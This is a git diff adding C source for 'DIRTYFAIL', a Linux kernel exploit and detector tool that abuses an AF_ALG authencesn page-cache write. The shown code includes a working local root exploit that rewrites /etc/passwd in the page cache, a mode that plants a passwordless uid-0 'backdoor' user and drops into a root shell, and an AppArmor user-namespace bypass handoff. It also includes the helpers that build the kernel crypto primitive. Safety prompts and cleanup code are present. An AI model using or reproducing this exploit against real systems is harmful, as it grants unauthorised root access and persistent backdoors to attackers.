+ memcpy(p, DF_PREFIX, strlen(DF_PREFIX)); p += strlen(DF_PREFIX); + memset(p, 'X', pad_len); p += pad_len; + memcpy(p, DF_SUFFIX, strlen(DF_SUFFIX)); p += strlen(DF_SUFFIX); + *p = '\0'; + + log_step("replacement: '%s'", target); + log_warn("about to length-match overwrite '%s' β†’ '%s' (%zu bytes)", + v.name, NEW_USER, v.line_len); + log_warn("ON-DISK /etc/passwd is unchanged. State stashed at %s.", STATE_FILE); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + + if (!save_state(v.line_off, v.line, v.line_len)) return DF_TEST_ERROR; + + /* Hand off to inner via env vars. */ + char off_str[32]; + snprintf(off_str, sizeof(off_str), "%lld", (long long)v.line_off); + setenv("DIRTYFAIL_INNER_MODE", "backdoor-install", 1); + setenv("DIRTYFAIL_LINE_OFF", off_str, 1); + setenv("DIRTYFAIL_VICTIM_LINE", v.line, 1); + setenv("DIRTYFAIL_TARGET_LINE", target, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner backdoor-install failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init ns */ + if (!(pw = getpwnam(NEW_USER)) || pw->pw_uid != 0) { + log_bad("post-flip getpwnam(%s) doesn't show uid 0 β€” install failed", + NEW_USER); + return DF_EXPLOIT_FAIL; + } + log_ok("'%s' is now uid 0 in the page cache copy of /etc/passwd", + NEW_USER); + log_hint("state stashed at %s β€” run 'dirtyfail --cleanup-backdoor' to revert", + STATE_FILE); + + if (!do_shell) return DF_EXPLOIT_OK; + log_ok("invoking 'su - %s' in init ns (PAM nullok β†’ REAL ROOT)", NEW_USER); + execlp("su", "su", "-", NEW_USER, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +df_result_t backdoor_cleanup(void) +{ + log_step("Persistent backdoor β€” cleanup"); + + off_t line_off = 0; + char victim_line[512]; + size_t victim_len = 0; + if (!load_state(&line_off, victim_line, sizeof(victim_line), &victim_len)) { + log_bad("no usable state file at %s", STATE_FILE); + return DF_TEST_ERROR; + } + log_step("restoring %zu bytes at offset %lld", victim_len, (long long)line_off); + + /* Read CURRENT bytes (post-install) so we know what to flip back from. */ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) { log_bad("open passwd: %s", strerror(errno)); return DF_TEST_ERROR; } + char cur[512]; + if (pread(fd, cur, victim_len, line_off) != (ssize_t)victim_len) { + log_bad("pread: %s", strerror(errno)); + close(fd); return DF_TEST_ERROR; + } + close(fd); + cur[victim_len] = '\0'; + + /* Hand off to inner. inner runs apply_flips(off, target=cur, victim=victim_line) + * to flip back from current state to original. */ + char off_str[32]; + snprintf(off_str, sizeof(off_str), "%lld", (long long)line_off); + setenv("DIRTYFAIL_INNER_MODE", "backdoor-cleanup", 1); + setenv("DIRTYFAIL_LINE_OFF", off_str, 1); + setenv("DIRTYFAIL_VICTIM_LINE", victim_line, 1); + setenv("DIRTYFAIL_TARGET_LINE", cur, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner backdoor-cleanup failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + unlink(STATE_FILE); + log_ok("backdoor cleaned β€” line restored, state file removed"); + +#ifdef POSIX_FADV_DONTNEED + int e = open("/etc/passwd", O_RDONLY); + if (e >= 0) { posix_fadvise(e, 0, 0, POSIX_FADV_DONTNEED); close(e); } +#endif + return DF_OK; +} diff --git a/modules/copy_fail_family/backdoor.h b/modules/copy_fail_family/backdoor.h new file mode 100644 index 0000000..adace78 --- /dev/null +++ b/modules/copy_fail_family/backdoor.h @@ -0,0 +1,59 @@ +/* + * DIRTYFAIL β€” backdoor.h + * + * Persistent uid-0 backdoor in the /etc/passwd page cache. + * + * MORE INVASIVE than the UID-flip exploits in copyfail.c / + * dirtyfrag_esp.c / dirtyfrag_rxrpc.c. Where those modify the calling + * user's UID for one shell session, this mode inserts a brand-new + * passwordless uid-0 user "dirtyfail" by length-matched overwrite of + * an existing nologin/false/sync line. The substituted line stays in + * the page cache until eviction, so: + * + * ./dirtyfail --exploit-backdoor # install + drop into root + * exit # back to your normal shell + * su - dirtyfail # any user, any time β†’ root + * + * The username "dirtyfail" is intentionally chosen to match this + * project β€” anyone auditing /etc/passwd will spot it immediately, + * which is the opposite of stealth-by-default. If you need an + * undetectable backdoor for an authorized red-team engagement, + * change NEW_USER in backdoor.c. + * + * The on-disk /etc/passwd is unchanged. State (LINE_OFF, original + * VICTIM_LINE) is persisted at /var/tmp/.dirtyfail.state so that + * `--cleanup-backdoor` can restore the original line byte-by-byte + * via the same 1-byte primitive. + * + * This mode requires the GCM single-byte primitive (`cfg_1byte_write`) + * to land arbitrary bytes at arbitrary offsets β€” the 4-byte authencesn + * primitive can't easily rewrite a 50-byte line that doesn't align + * to 4-byte boundaries. + * + * Technique credit: 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo + * (`run.sh`); reimplemented here as a single C function. + */ + +#ifndef DIRTYFAIL_BACKDOOR_H +#define DIRTYFAIL_BACKDOOR_H + +#include "common.h" + +df_result_t backdoor_install(bool do_shell); +df_result_t backdoor_cleanup(void); + +/* INNER variants β€” run inside the AA bypass userns. The inner reads + * the operation parameters from env vars set by the outer: + * DIRTYFAIL_INNER_MODE = backdoor-install | backdoor-cleanup + * DIRTYFAIL_LINE_OFF = byte offset of the victim line + * DIRTYFAIL_VICTIM_LINE = original /etc/passwd line bytes + * DIRTYFAIL_TARGET_LINE = (install only) replacement bytes + */ +df_result_t backdoor_install_inner(void); +df_result_t backdoor_cleanup_inner(void); + +/* Used by --list-state. Returns true if a backdoor state file is present + * (and prints a summary), false if no file exists. Side-effect free. */ +bool backdoor_list_state(void); + +#endif diff --git a/modules/copy_fail_family/common.c b/modules/copy_fail_family/common.c new file mode 100644 index 0000000..7458b21 --- /dev/null +++ b/modules/copy_fail_family/common.c @@ -0,0 +1,362 @@ +/* + * DIRTYFAIL β€” common.c + * + * Tiny utility surface shared by the detectors and exploiters. Nothing + * here is CVE-specific β€” that lives in copyfail.c, dirtyfrag_esp.c and + * dirtyfrag_rxrpc.c. + */ + +#include "common.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#ifdef __linux__ +#include +#endif + +/* On glibc +_GNU_SOURCE provides these. macOS lacks them; we + * still want this file to parse under macOS clang for static analysis, + * so the unprivileged_userns_allowed body itself is platform-guarded. */ +#ifndef CLONE_NEWUSER +#define CLONE_NEWUSER 0x10000000 +#endif + +bool dirtyfail_use_color = true; +bool dirtyfail_active_probes = false; +bool dirtyfail_no_revert = false; +bool dirtyfail_json = false; + +static void vlog(FILE *out, const char *prefix, const char *color, + const char *fmt, va_list ap) +{ + if (dirtyfail_use_color && color) + fprintf(out, "\033[%sm%s\033[0m ", color, prefix); + else + fprintf(out, "%s ", prefix); + vfprintf(out, fmt, ap); + fputc('\n', out); + /* Flush β€” when stdout is piped (e.g. through ssh, timeout, tee) + * the default fully-buffered mode hides log lines until either the + * process exits cleanly or 4 KiB accumulates. We log to follow + * progress; visibility wins over throughput here. */ + fflush(out); +} + +/* In --json mode, all log output goes to stderr so stdout stays a + * clean JSON document for downstream parsers. Outside --json mode, + * we keep the original split (info/progress to stdout, errors to + * stderr) for human readability. */ +#define LOG_FN(name, prefix, color, default_stream) \ + void name(const char *fmt, ...) { \ + FILE *_s = dirtyfail_json ? stderr : (default_stream); \ + va_list ap; va_start(ap, fmt); \ + vlog(_s, prefix, color, fmt, ap); \ + va_end(ap); \ + } + +LOG_FN(log_step, "[*]", "1;36", stdout) /* cyan */ +LOG_FN(log_ok, "[+]", "1;32", stdout) /* green */ +LOG_FN(log_bad, "[-]", "1;31", stderr) /* red */ +LOG_FN(log_warn, "[!]", "1;33", stderr) /* yellow*/ +LOG_FN(log_hint, "[i]", "0;37", stdout) /* dim */ + +/* ------------------------------------------------------------------ */ + +bool kernel_version(int *major, int *minor) +{ + struct utsname u; + if (uname(&u) != 0) return false; + /* release looks like "6.12.0-124.49.1.el10_1.x86_64" β€” split on dots. */ + char *dot1 = strchr(u.release, '.'); + if (!dot1) return false; + *dot1 = '\0'; + *major = atoi(u.release); + char *dot2 = strchr(dot1 + 1, '.'); + if (dot2) *dot2 = '\0'; + *minor = atoi(dot1 + 1); + return true; +} + +bool kmod_loaded(const char *name) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + size_t nlen = strlen(name); + bool found = false; + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, name, nlen) == 0 && line[nlen] == ' ') { + found = true; + break; + } + } + fclose(f); + return found; +} + +/* Probe by spawning a child. Doing it inline would either succeed (and + * leave us in a fresh userns for the rest of the run, breaking later + * checks) or fail and leave errno polluted. The fork is cheap enough. + * + * We use syscall(SYS_unshare) rather than the libc wrapper so this + * compiles on toolchains where doesn't expose unshare(). */ +bool unprivileged_userns_allowed(void) +{ +#ifdef __linux__ + pid_t pid = fork(); + if (pid < 0) return false; + if (pid == 0) { + if (syscall(SYS_unshare, CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int wstatus = 0; + waitpid(pid, &wstatus, 0); + return WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 0; +#else + return false; /* macOS analysis path β€” never executed in production */ +#endif +} + +bool find_passwd_uid_field(const char *username, + off_t *uid_off, size_t *uid_len, + char *uid_str) +{ + int fd = open("/etc/passwd", O_RDONLY); + if (fd < 0) return false; + + struct stat st; + if (fstat(fd, &st) < 0) { close(fd); return false; } + + char *buf = malloc(st.st_size + 1); + if (!buf) { close(fd); return false; } + ssize_t got = read(fd, buf, st.st_size); + close(fd); + if (got <= 0) { free(buf); return false; } + buf[got] = '\0'; + + bool found = false; + size_t ulen = strlen(username); + char *line = buf; + while (line < buf + got) { + if (strncmp(line, username, ulen) == 0 && line[ulen] == ':') { + /* user:x:UID:GID:... β€” skip 2 colons to land on UID start. */ + char *p = line + ulen + 1; + char *colon = strchr(p, ':'); + if (!colon) break; + char *uid_start = colon + 1; + char *uid_end = strchr(uid_start, ':'); + if (!uid_end) break; + size_t len = uid_end - uid_start; + if (len >= 16) break; + *uid_off = uid_start - buf; + *uid_len = len; + memcpy(uid_str, uid_start, len); + uid_str[len] = '\0'; + found = true; + break; + } + char *nl = strchr(line, '\n'); + if (!nl) break; + line = nl + 1; + } + free(buf); + return found; +} + +bool drop_caches(void) +{ + int fd = open("/proc/sys/vm/drop_caches", O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, "3\n", 2); + close(fd); + return n == 2; +} + +void hex_dump(const unsigned char *buf, size_t len) +{ + for (size_t i = 0; i < len; i += 16) { + printf(" %04zx ", i); + for (size_t j = 0; j < 16; j++) { + if (i + j < len) printf("%02x ", buf[i + j]); + else printf(" "); + } + printf(" |"); + for (size_t j = 0; j < 16 && i + j < len; j++) { + unsigned char c = buf[i + j]; + putchar(isprint(c) ? c : '.'); + } + printf("|\n"); + } +} + +/* + * authenc keyblob layout (see crypto/authenc.c::crypto_authenc_setkey): + * + * struct rtattr { __u16 rta_len; __u16 rta_type; } = 4 bytes + * __be32 enckeylen = 4 bytes + * authkey[authkeylen] + * enckey [enckeylen] + * + * rta_len in the rtattr counts the rtattr header *plus* the enckeylen + * field, so it is always 8. + */ +size_t build_authenc_keyblob(unsigned char *out, + const unsigned char *authkey, size_t authkeylen, + const unsigned char *enckey, size_t enckeylen) +{ + /* struct rtattr { u16 rta_len; u16 rta_type; } */ + out[0] = 8; out[1] = 0; + out[2] = CRYPTO_AUTHENC_KEYA_PARAM; + out[3] = 0; + /* __be32 enckeylen */ + out[4] = (enckeylen >> 24) & 0xff; + out[5] = (enckeylen >> 16) & 0xff; + out[6] = (enckeylen >> 8) & 0xff; + out[7] = (enckeylen ) & 0xff; + memcpy(out + 8, authkey, authkeylen); + memcpy(out + 8 + authkeylen, enckey, enckeylen); + return 8 + authkeylen + enckeylen; +} + +bool typed_confirm(const char *expected) +{ + char buf[128]; + printf(" Type \033[1;33m%s\033[0m and press enter to proceed: ", expected); + fflush(stdout); + if (!fgets(buf, sizeof(buf), stdin)) return false; + /* strip trailing newline */ + size_t n = strlen(buf); + while (n > 0 && (buf[n-1] == '\n' || buf[n-1] == '\r')) buf[--n] = '\0'; + return strcmp(buf, expected) == 0; +} + +static uid_t read_outer_id(const char *path) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) return (uid_t)-1; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n <= 0) return (uid_t)-1; + buf[n] = '\0'; + /* Format: " ". For init namespace, this is + * "0 0 4294967295" β€” outer == 0 == real root. For our userns it's + * "0 1000 1" β€” outer == 1000 == real uid. */ + int inner = -1, outer = -1, count = 0; + if (sscanf(buf, "%d %d %d", &inner, &outer, &count) != 3 || inner != 0) + return (uid_t)-1; + return (uid_t)outer; +} + +uid_t real_uid_for_target(void) +{ + uid_t outer = read_outer_id("/proc/self/uid_map"); + /* If we're root in the init namespace OR no userns β€” return getuid(). + * The init namespace map shows "0 0 4294967295" β†’ outer=0; only + * trust an outer != 0 (and != -1) as the bypass-userns case. */ + if (outer == (uid_t)-1) return getuid(); + if (outer == 0) return getuid(); + return outer; +} + +gid_t real_gid_for_target(void) +{ + uid_t outer = read_outer_id("/proc/self/gid_map"); + if (outer == (uid_t)-1) return getgid(); + if (outer == 0) return getgid(); + return (gid_t)outer; +} + +/* Best-effort eviction of /etc/passwd from the page cache. Used by + * the --no-shell path to revert the page-cache modification after a + * successful exploit + verify. + * + * The naive `posix_fadvise(POSIX_FADV_DONTNEED)` is unreliable here: + * since Linux 6.3, fadvise requires write access to the file, and we + * typically don't have write access to /etc/passwd from inside the + * AA bypass userns (root in userns maps to overflow uid in init ns, + * which doesn't own the file). + * + * So we try in order: + * 1. posix_fadvise on a fresh O_RDONLY fd (best case) + * 2. sudo drop_caches via the system shell β€” works if the user has + * passwordless sudo, which is common on test VMs but a + * reasonable assumption to fail closed on + * + * Returns true if the cache was definitely cleared, false otherwise. + * Caller should treat false as "page cache may still be modified β€” + * tell the user to reboot if their session breaks". */ +bool try_revert_passwd_page_cache(void) +{ + bool ok = false; +#ifdef POSIX_FADV_DONTNEED + int fd = open("/etc/passwd", O_RDONLY); + if (fd >= 0) { + if (posix_fadvise(fd, 0, 0, POSIX_FADV_DONTNEED) == 0) ok = true; + close(fd); + } +#endif + + /* Even if fadvise returned 0, modern kernels silently no-op when + * we lack write access β€” verify by re-reading and comparing to + * what's on disk via O_DIRECT. Too fiddly. Just always also try + * drop_caches as belt+suspenders. */ + int rc = system("sudo -n /bin/sh -c 'echo 3 > /proc/sys/vm/drop_caches' " + ">/dev/null 2>&1"); + if (rc == 0) ok = true; + return ok; +} + +bool ssh_lockout_check(const char *target_user) +{ + const char *ssh_conn = getenv("SSH_CONNECTION"); + if (!ssh_conn || !*ssh_conn) return true; /* not over SSH */ + + const char *user = getenv("USER"); + if (!user) { + struct passwd *pw = getpwuid(real_uid_for_target()); + user = pw ? pw->pw_name : ""; + } + if (strcmp(user, target_user) != 0) return true; /* different user */ + + log_warn("================================================================="); + log_warn(" SSH LOCKOUT WARNING"); + log_warn("================================================================="); + log_warn(" You are running this exploit OVER SSH against your OWN account."); + log_warn(" The page-cache write will mark '%s' as uid 0 in /etc/passwd.", + target_user); + log_warn(" Once that lands:"); + log_warn(" - sshd looks up '%s', sees uid 0", target_user); + log_warn(" - StrictModes rejects ~/.ssh/authorized_keys (owner uid 1000"); + log_warn(" != logging-in uid 0) β†’ publickey auth fails"); + log_warn(" - PAM password auth also fails (uid mismatch)"); + log_warn(" Recovery requires console access to drop_caches or reboot."); + log_warn(" If this is what you want, type YES_BREAK_SSH below."); + log_warn(" Otherwise consider --exploit-backdoor (targets a nologin line"); + log_warn(" instead of your account, doesn't break SSH)."); + log_warn("================================================================="); + + return typed_confirm("YES_BREAK_SSH"); +} + +int open_and_cache(const char *path) +{ + int fd = open(path, O_RDONLY); + if (fd < 0) return -1; + /* Force a read so the page is in the cache. The exploit primitives + * all assume the target page is already populated. We don't care + * what the bytes are or whether read returns short β€” only that the + * kernel pulled the page into the cache as a side effect. */ + char tmp[4096]; + if (read(fd, tmp, sizeof(tmp)) < 0) { + /* primer failed; caller's splice will surface a useful errno. */ + } + lseek(fd, 0, SEEK_SET); + return fd; +} diff --git a/modules/copy_fail_family/common.h b/modules/copy_fail_family/common.h new file mode 100644 index 0000000..53dd477 --- /dev/null +++ b/modules/copy_fail_family/common.h @@ -0,0 +1,197 @@ +/* + * DIRTYFAIL β€” common.h + * + * Shared declarations for the DIRTYFAIL detector + PoC binary. + * + * This file is intentionally light: AF_ALG / SOL_ALG constants that older + * libcs do not export, log macros that respect --no-color, and the + * type definitions used by every CVE module. + */ + +#ifndef DIRTYFAIL_COMMON_H +#define DIRTYFAIL_COMMON_H + +/* The Makefile passes -D_GNU_SOURCE on the command line; this guard + * keeps gcc from warning about a duplicate definition when callers + * include common.h after the cmdline -D has already taken effect. */ +#ifndef _GNU_SOURCE +#define _GNU_SOURCE +#endif +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ------------------------------------------------------------------ * + * AF_ALG constants + * + * These are upstream in , but plenty of distros ship + * stale headers. Declare locally so DIRTYFAIL builds on every target + * we have run it against (Ubuntu 22.04 β†’ 24.04, RHEL 9/10, Fedora 42+). + * ------------------------------------------------------------------ */ +#ifndef AF_ALG +#define AF_ALG 38 +#endif +#ifndef SOL_ALG +#define SOL_ALG 279 +#endif +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 +#define CRYPTO_AUTHENC_KEYA_PARAM 1 /* rtattr type, */ + +struct sockaddr_alg_compat { + unsigned short salg_family; + unsigned char salg_type[14]; + unsigned int salg_feat; + unsigned int salg_mask; + unsigned char salg_name[64]; +}; + +/* ------------------------------------------------------------------ * + * Logging + * + * DIRTYFAIL output is meant to be skim-readable by a researcher *and* + * grep-friendly in CI. We use a small set of fixed prefixes so that + * automation can match on lines without parsing color escapes: + * + * [*] step / status [+] good news / detection result + * [-] bad news [!] attention / VULNERABLE + * [i] hint [?] prompt + * ------------------------------------------------------------------ */ +extern bool dirtyfail_use_color; + +/* When true, --scan and --check-* modes do an active sentinel-file STORE + * probe per mode in addition to precondition checks. Set by --active. */ +extern bool dirtyfail_active_probes; + +/* When true, --no-shell mode skips the auto-revert step β€” the page-cache + * plant survives until --cleanup or drop_caches. Used by the + * container-escape demo to show that the corruption crosses namespace + * boundaries. Set by --no-revert. */ +extern bool dirtyfail_no_revert; + +/* When true, --scan emits a single JSON object on stdout (suitable for + * SIEM/fleet ingestion); all log output (banner, step/ok/bad/warn/hint) + * is redirected to stderr. Set by --json. */ +extern bool dirtyfail_json; + +void log_step (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_ok (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_bad (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_warn (const char *fmt, ...) __attribute__((format(printf, 1, 2))); +void log_hint (const char *fmt, ...) __attribute__((format(printf, 1, 2))); + +/* ------------------------------------------------------------------ * + * Result codes returned by every detector / exploiter. + * + * They map onto exit codes used by the top-level binary so that CI + * pipelines can branch on them without parsing stdout: + * + * DF_OK exit 0 not vulnerable + * DF_VULNERABLE exit 2 vulnerable (detector confirmed primitive) + * DF_PRECOND_FAIL exit 0 prerequisites missing β†’ not vulnerable here + * DF_TEST_ERROR exit 1 could not determine + * DF_EXPLOIT_OK exit 0 exploit succeeded (root achieved) + * DF_EXPLOIT_FAIL exit 3 exploit attempted but did not land + * + * Detectors should never return DF_EXPLOIT_*; exploiters should never + * return DF_PRECOND_FAIL (they assume the detector ran first). + * ------------------------------------------------------------------ */ +typedef enum { + DF_OK = 0, + DF_VULNERABLE = 2, + DF_PRECOND_FAIL = 4, + DF_TEST_ERROR = 1, + DF_EXPLOIT_OK = 5, + DF_EXPLOIT_FAIL = 3, +} df_result_t; + +/* ------------------------------------------------------------------ * + * Utilities (common.c) + * ------------------------------------------------------------------ */ + +/* Parse uname(2)->release into (major, minor). Returns false on parse error. */ +bool kernel_version(int *major, int *minor); + +/* Read /proc/modules and return true if `name` is loaded. Returns false + * (and sets errno) if /proc/modules cannot be opened. */ +bool kmod_loaded(const char *name); + +/* Best-effort: can the calling user create a user namespace? + * forks a child that calls unshare(CLONE_NEWUSER) and reports back. */ +bool unprivileged_userns_allowed(void); + +/* Find current user's UID/GID field offsets in /etc/passwd. + * uid_off, uid_len: byte offset and string length of UID field + * uid_str: caller-supplied buffer >= 16 bytes; receives current UID + * Returns false if user not found or UID isn't a 4-digit number. */ +bool find_passwd_uid_field(const char *username, + off_t *uid_off, size_t *uid_len, + char *uid_str); + +/* Drop the kernel page cache. Requires root. */ +bool drop_caches(void); + +/* Best-effort eviction of /etc/passwd from page cache. Tries + * POSIX_FADV_DONTNEED, then `sudo drop_caches` as belt-and-suspenders. + * Returns true if at least one path succeeded. See common.c for + * caveats. */ +bool try_revert_passwd_page_cache(void); + +/* Print a hex+ASCII dump (max `len` bytes). For debug output. */ +void hex_dump(const unsigned char *buf, size_t len); + +/* Build the rtattr-prefixed authenc keyblob expected by ALG_SET_KEY for + * authencesn(hmac(sha256), cbc(aes)). `out` must be >= 8+authkeylen+enckeylen. + * Returns total bytes written. */ +size_t build_authenc_keyblob(unsigned char *out, + const unsigned char *authkey, size_t authkeylen, + const unsigned char *enckey, size_t enckeylen); + +/* Prompt the user to type the literal string `expected` and press enter. + * Returns true only on exact match. Used as a last-line gate before + * --exploit modifies real system state. */ +bool typed_confirm(const char *expected); + +/* Convenience: open `path` RO and return a freshly-cached fd. + * The page-cache primitives below all assume the page is hot. */ +int open_and_cache(const char *path); + +/* Return the user's real (outer) uid, defeating the userns illusion. + * + * After the AppArmor bypass enters us into a fresh user namespace with + * uid_map "0 1", `getuid()` returns 0 inside the namespace β€” + * which lies to exploit code that wants to know which user account to + * target in /etc/passwd. This helper reads /proc/self/uid_map; if it + * shows a non-identity mapping like "0 1000 1", returns the outer uid + * (1000). Otherwise (init namespace, or no userns at all) returns + * `getuid()`. + * + * Same idea for real_gid_for_target. */ +uid_t real_uid_for_target(void); +gid_t real_gid_for_target(void); + +/* If $SSH_CONNECTION is set AND `target_user` is the SSH login user, + * the user-uid-flip exploits about to fire will lock the operator out + * of SSH (sshd reads modified /etc/passwd, sees uid 0, then StrictModes + * rejects ~/.ssh/authorized_keys because file owner != logging-in uid). + * The lockout persists until the page cache is evicted β€” typically only + * a reboot recovers, since drop_caches needs root. + * + * Emit a loud warning and require an extra typed_confirm("YES_BREAK_SSH"). + * Returns true to proceed, false to abort. Always returns true when not + * over SSH or when the target user differs from $USER. */ +bool ssh_lockout_check(const char *target_user); + +#endif /* DIRTYFAIL_COMMON_H */ diff --git a/modules/copy_fail_family/copyfail.c b/modules/copy_fail_family/copyfail.c new file mode 100644 index 0000000..4460031 --- /dev/null +++ b/modules/copy_fail_family/copyfail.c @@ -0,0 +1,451 @@ +/* + * DIRTYFAIL β€” copyfail.c β€” CVE-2026-31431 ("Copy Fail") + * + * Detector + opt-in PoC. + * + * BACKGROUND + * ---------- + * The Linux kernel's authencesn(hmac(sha256), cbc(aes)) AEAD template + * performs a 4-byte "scratch" copy at the end of its destination + * scatterlist as part of moving the ESN sequence-number high bits + * around. The crypto code assumes src and dst point at kernel-private + * memory. They do β€” except when the AF_ALG socket family is used: + * algif_aead lets userspace splice() pages into the request, and the + * AEAD primitive runs in-place. By splicing a page-cache page from a + * readable file into the request, the scratch write lands in that page + * cache. The on-disk file is untouched, but the kernel (and every + * subsequent reader) sees the modified copy until the page is evicted. + * + * The 4 bytes that get written are bytes 4..7 of the AAD ("seqno_lo" + * in the ESP header layout), which userspace controls directly. Net + * result: an unprivileged 4-byte arbitrary-offset write into any + * world-readable file's page cache. + * + * DETECTION STRATEGY + * ------------------ + * We never touch system files in detection. Instead we: + * 1. Confirm AF_ALG + authencesn(...) can be instantiated. + * 2. Create a sentinel file in $TMPDIR and fault its first page in. + * 3. Run the exact primitive against the sentinel file with a + * recognizable marker ("PWND") in seqno_lo. + * 4. Re-read the sentinel and look for the marker bytes. + * + * If the marker shows up: the kernel just wrote attacker-controlled + * bytes into a page-cache page over an unmodified disk file. That is + * the entire vulnerability. Vulnerable. + * + * EXPLOIT STRATEGY + * ---------------- + * /etc/passwd is world-readable and contains a 4-digit UID for normal + * users (1000-9999). Flipping that UID to "0000" in the page cache + * makes glibc's getpwnam() report uid=0 for our user. PAM (which still + * checks /etc/shadow on disk, untouched) accepts the real password, + * and then setuid(0) lands us at root. Single 4-byte write, fully + * reversible with POSIX_FADV_DONTNEED. + */ + +#include "copyfail.h" + +#include +#include +#include +#include + +/* These macros come from on Linux but vary across libcs. */ +#ifndef MSG_MORE +#define MSG_MORE 0x8000 +#endif + +#ifdef __linux__ +extern ssize_t splice(int, loff_t *, int, loff_t *, size_t, unsigned int); +#else +/* macOS analysis stub β€” never called at runtime. */ +static ssize_t splice(int a, void *b, int c, void *d, size_t e, unsigned f) +{ (void)a; (void)b; (void)c; (void)d; (void)e; (void)f; errno = ENOSYS; return -1; } +#endif + +#define PAGE 4096 +#define ASSOCLEN 8 /* SPI(4) || seqno_lo(4) */ +#define CRYPTLEN 16 /* one AES block */ +#define TAGLEN 16 /* truncated HMAC-SHA256 */ +#define SPLICE_LEN (CRYPTLEN + TAGLEN) +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" +#define MARKER_STR "PWND" + +/* ---------------------------------------------------------------- * + * af_alg_setup_socket() + * + * Creates the master AF_ALG socket, binds it to authencesn, sets a + * zero key (auth+enc), and accept(2)s an op socket. Returns the op fd + * (or -1 with errno set). On success the master fd is closed before + * return β€” we only need the op socket for the actual transaction. + * ---------------------------------------------------------------- */ +static int af_alg_setup_socket(void) +{ + int master = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (master < 0) return -1; + + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "aead", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, ALG_NAME, sizeof(sa.salg_name) - 1); + if (bind(master, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(master); + return -1; + } + + /* Auth key (HMAC-SHA256) is 32 bytes; cipher key (AES-128) is 16. + * We pick zero for both β€” auth verification will fail at the end + * (EBADMSG), but the buggy scratch-write fires *before* that, so + * the page-cache modification persists either way. */ + unsigned char auth[32] = {0}, enc[16] = {0}; + unsigned char keyblob[8 + 32 + 16]; + size_t keylen = build_authenc_keyblob(keyblob, auth, 32, enc, 16); + if (setsockopt(master, SOL_ALG, ALG_SET_KEY, keyblob, keylen) < 0) { + close(master); + return -1; + } + + int op = accept(master, NULL, NULL); + int saved = errno; + close(master); + errno = saved; + return op; +} + +/* ---------------------------------------------------------------- * + * af_alg_send_aad() + * + * Sends per-op control messages (decrypt, IV, assoclen=8) plus the + * AAD itself with MSG_MORE. AAD layout: + * + * bytes 0..3 SPI (we leave zero β€” the kernel doesn't care) + * bytes 4..7 seqno_lo (this is the 4 bytes that get STOREd) + * + * Returns true on success. + * ---------------------------------------------------------------- */ +static bool af_alg_send_aad(int op, const unsigned char four_bytes[4]) +{ + unsigned char aad[ASSOCLEN] = { 0 }; + memcpy(aad + 4, four_bytes, 4); + + unsigned int op_decrypt = ALG_OP_DECRYPT; + unsigned int assoclen = ASSOCLEN; + unsigned char iv[20]; /* u32 ivlen + 16-byte IV */ + *(uint32_t *)iv = 16; + memset(iv + 4, 0, 16); + + /* CMSG_SPACE values for: ALG_SET_OP(u32), ALG_SET_IV(u32+16), ALG_SET_ASSOCLEN(u32). */ + union { + char buf[CMSG_SPACE(sizeof(unsigned int)) + + CMSG_SPACE(20) + + CMSG_SPACE(sizeof(unsigned int))]; + struct cmsghdr align; + } ctrl; + memset(&ctrl, 0, sizeof(ctrl)); + + struct iovec iov = { .iov_base = aad, .iov_len = ASSOCLEN }; + struct msghdr msg = { + .msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = ctrl.buf, + .msg_controllen = sizeof(ctrl.buf), + }; + + struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); + cm->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_OP; + memcpy(CMSG_DATA(cm), &op_decrypt, sizeof(op_decrypt)); + + cm = CMSG_NXTHDR(&msg, cm); + cm->cmsg_len = CMSG_LEN(20); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_IV; + memcpy(CMSG_DATA(cm), iv, 20); + + cm = CMSG_NXTHDR(&msg, cm); + cm->cmsg_len = CMSG_LEN(sizeof(unsigned int)); + cm->cmsg_level = SOL_ALG; + cm->cmsg_type = ALG_SET_AEAD_ASSOCLEN; + memcpy(CMSG_DATA(cm), &assoclen, sizeof(assoclen)); + + return sendmsg(op, &msg, MSG_MORE) >= 0; +} + +/* ---------------------------------------------------------------- * + * cf_4byte_write() + * + * The whole primitive in one function: open the target, force its + * page into the cache, set up an AF_ALG op socket, send AAD with our + * controlled 4 bytes, splice 32 bytes from the target file into the + * op socket (the kernel uses those page-cache pages as the *destination* + * of the in-place AEAD), then drive the op via recv() so that the + * scratch-write fires. + * + * `four_bytes` lands at file offset `target_off` of the cached page. + * Returns true on success (with errno cleared) 